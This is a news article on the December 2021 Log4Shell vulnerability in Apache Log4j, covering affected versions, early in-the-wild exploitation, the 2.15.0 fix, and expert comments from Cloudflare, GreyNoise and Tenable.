The flaw, an unauthenticated remote code exploit, allows the complete takeover of systems using versions 2.0-beta9 up to 2.14.1 of the library.
Developed by the Apache Software Foundation, Log4j is used in software that does not use Java as well and products from Apple, Amazon, Cloudflare, Twitter and Steam are all susceptible.
Earliest evidence we’ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC. That suggests it was in the wild at least 9 days before publicly disclosed. However, don’t see evidence of mass exploitation until after public disclosure.
— Matthew Prince ? (@eastdakota) December 11, 2021
In a tweet on Saturday, British infosec expert Kevin Beaumont said he was seeing widespread exploitation against his honeypots. "...intriguingly, [there was] an attempt against an Apache box before details of this became public," he added.
|
|
Apache has released version 2.15.0 as a fix.
In a blog post, Satnam Narang, a staff research engineer at security shop Tenable, said Log4Shell affected, but was not limited to, Apache Druid, Apache Flink, Apache Solr, Apache Spark, Apache Struts2 and Apache Tomcat.
GreyNoise is detecting a sharply increasing number of hosts opportunistically exploiting Apache Log4J CVE-2021-44228. Exploitation occurring from ~100 distinct hosts, almost all of which are Tor exit nodes. Tags available to all users and customers now. https://t.co/JF3tUkpIrq pic.twitter.com/CTMi0IWQ5j
— GreyNoise (@GreyNoiseIO) December 10, 2021
"CVE-2021-44228 is a remote code execution vulnerability in Apache Log4j2," he said. "An unauthenticated, remote attacker could exploit this flaw by sending a specially crafted request to a server running a vulnerable version of log4j.
"The crafted request uses a Java Naming and Directory Interface injection via a variety of services including Lightweight Directory Access Protocol, Secure LDAP, Remote Method Invocation or Domain Name Service.
"If the vulnerable server uses Log4j2 to log requests, the exploit will then request a malicious payload over JNDI through one of the services above from an attacker-controlled server. Successful exploitation could lead to RCE."
The flaw was first seen to be affecting several versions of Minecraft, the popular sandbox video game, he added.
Amit Yoran, chairman and chief executive of Tenable, said: "The Apache Log4j Remote Code Execution Vulnerability is the single biggest, most critical vulnerability of the last decade. When all of the research is done, we may in fact learn that it is the single biggest vulnerability in the history of modern computing.
"This kind of vulnerability is a reminder that organisations must develop mature cyber security programs to understand cyber risk in a dynamic world.
"While details are still emerging, we encourage organisations to update their security controls, assume they have been compromised and activate existing incident response plans.
"The number one priority now is to work with your in-house information security and engineering teams or partner with an organisation that conducts incident response to identify the impact to your business."
